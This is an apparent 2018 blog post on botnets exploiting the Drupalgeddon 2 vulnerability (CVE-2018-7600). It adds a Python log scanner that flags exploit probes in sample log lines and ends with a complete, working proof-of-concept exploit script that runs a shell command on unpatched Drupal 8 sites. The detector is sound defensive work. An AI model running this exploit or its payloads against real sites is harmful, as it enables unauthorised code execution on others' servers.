Botnets exploiting the Drupalgeddon 2 Drupal vulnerability emerge

Submitted by dryer on Thu, 04/19/2018 - 12:13

Several weeks after responsible hosters patched their installations for Drupalgeddon 2 (CVE-2018-7600), many unpatched installations remain. The vulnerability was disclosed in late March. Once Check Point published its analysis uncovering Drupalgeddon 2, attackers began exploiting the issue.

Several botnets are now exploiting unpatched installations. Drupal 7 remains the most widely deployed version of Drupal, but Drupal 8 has some adoption as well. Notable Drupal users such as Cambridge Analytica continue to run vulnerable versions of Drupal 8, and this could become as serious an issue as it was for Mossack Fonseca, whose outdated Drupal installation was reported as the vector for the Panama Papers leak in 2016.

Automated botnets are now scanning the internet at large, ready to exploit any vulnerable installation of the open-source content management system. Drupal lags behind WordPress in popularity, having chosen to challenge SharePoint and other tools in the enterprise market, but there are still thousands of vulnerable Drupal installations in the world.

Drupal installations exploited with botnets

The botnets exploiting CVE-2018-7600 are being uncovered rapidly by security researchers:

Early warning, three tsunami botnet variants utilizing Drupal_RCE #CVE_2018_7600 are actively spreading since yesterday, we have logged 10+ C2s, will provide more updates on our blog tomorrow. - Netlab 360

These botnets are being used to install malware such as cryptocurrency miners and backdoors on unpatched Drupal sites. The Drupalgeddon 2 attack patterns match earlier campaigns against Oracle products, which fits Drupal's enterprise profile. More information is available on other blogs:

All users of the Drupal content management system should upgrade to a patched release (Drupal 7.58, 8.5.1, 8.4.6 or 8.3.9, per SA-CORE-2018-002) to avoid compromise.
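Patching is the fix, but a site owner also wants to know whether the botnets described above have already knocked on the door. The following detector is an added example for this post (not code from the original article, from Netlab 360, or from Drupal) that scans combined-format web-server access logs for CVE-2018-7600 probes. The log lines are constructed for illustration; the request shapes they contain are the Drupal 8 vector (user/register with element_parents pointing at a '#' property) and the Drupal 7 vector (user/password with name[#post_render] in the query string). Because an access log only records the request line, detection keys on the query string: any Form API key beginning with '#', or an element_parents value that reaches into one.

```python
#!/usr/bin/env python3
"""Flag Drupalgeddon 2 (CVE-2018-7600) probes in combined-format access logs.

Added example; not code from the original post, Netlab 360 or Drupal.
The SAMPLE_LOG lines are constructed: lines 1-2 are exploitation attempts,
lines 3-4 are benign traffic to the same registration form.
"""
import re
from typing import Dict, List
from urllib.parse import parse_qsl, urlsplit

SAMPLE_LOG = """\
203.0.113.5 - - [19/Apr/2018:10:01:22 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 512 "-" "python-requests/2.18.4"
198.51.100.7 - - [19/Apr/2018:10:02:03 +0000] "POST /?q=user/password&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=id HTTP/1.1" 200 3011 "-" "Mozilla/5.0"
192.0.2.9 - - [19/Apr/2018:10:03:15 +0000] "GET /user/register HTTP/1.1" 200 9812 "-" "Mozilla/5.0"
192.0.2.9 - - [19/Apr/2018:10:03:40 +0000] "POST /user/register?ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 1200 "https://example.org/user/register" "Mozilla/5.0"
"""

# Apache/nginx combined log format: only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def drupalgeddon2_indicators(target: str) -> List[str]:
    """Return the reasons a request target looks like a CVE-2018-7600 probe (empty if none)."""
    reasons = []
    query = urlsplit(target).query
    # parse_qsl percent-decodes keys and values, so '%23post_render' arrives as '#post_render'.
    for key, value in parse_qsl(query, keep_blank_values=True):
        # Form API render properties start with '#'; a browser never submits such a key.
        if key.startswith('#') or '[#' in key:
            reasons.append(f"form-API property in query key: {key}")
        # Drupal 8 AJAX vector: element_parents walks the form tree into a '#' property.
        if key == 'element_parents' and '#' in value:
            reasons.append(f"element_parents references a '#' property: {value}")
    return reasons


def scan_log(text: str) -> List[Dict]:
    """Parse each log line and collect the ones carrying Drupalgeddon 2 indicators."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = drupalgeddon2_indicators(m['target'])
        if reasons:
            hits.append({
                'ip': m['ip'],
                'ts': m['ts'],
                'method': m['method'],
                'status': int(m['status']),
                'reasons': reasons,
            })
    return hits


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit['ts'], hit['ip'], hit['method'], hit['status'], '; '.join(hit['reasons']))
```

A 200 response to a flagged request is not proof of compromise on its own, since Drupal answers the AJAX endpoint with 200 on a patched site too, but it is the trigger to check the web root for dropped files (the PoC below writes hello.txt there) and for unexpected processes. The POST body, which carries the Drupal 8 payload, is not in the access log at all; inspecting it needs a WAF or a reverse proxy that logs request bodies.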

Drupalgeddon 2 exploit example

An example exploit for CVE-2018-7600, written in Python and targeting the Drupal 8 user registration form, is published on GitHub (a2u/CVE-2018-7600):

#!/usr/bin/env python3
import sys
import requests

print('################################################################')
print('# Proof-Of-Concept for CVE-2018-7600')
print('# by Vitalii Rudnykh')
print('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print('# https://github.com/a2u/CVE-2018-7600')
print('################################################################')
print('Provided only for educational or information purposes\n')

target = input('Enter target url (example: https://domain.ltd/): ').strip()
if not target.endswith('/'):
    target += '/'  # the paths below are appended directly to the base URL

# Add proxy support (eg. BURP to analyze HTTP(s) traffic)
# set verify = False if your proxy certificate is self signed
# remember to set proxies both for http and https

# example:
# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
# verify = False
proxies = {}
verify = True

# Drupal 8 AJAX endpoint of the registration form. element_parents walks into the
# form's mail element, and the '#' keys in the POST body are merged into that
# render array. Drupal then calls the '#post_render' callback (exec) with the
# rendered '#markup' as its first argument, so the shell command runs on the server.
url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload = {
    'form_id': 'user_register_form',
    '_drupal_ajax': '1',
    'mail[#post_render][]': 'exec',
    'mail[#type]': 'markup',
    'mail[#markup]': 'echo ";-)" | tee hello.txt',
}

r = requests.post(url, proxies=proxies, data=payload, verify=verify, timeout=15)

# The command writes hello.txt into the web root; fetching it confirms execution.
check = requests.get(target + 'hello.txt', proxies=proxies, verify=verify, timeout=15)
if check.status_code != 200:
    sys.exit('Not exploitable')
print('\nCheck: ' + target + 'hello.txt')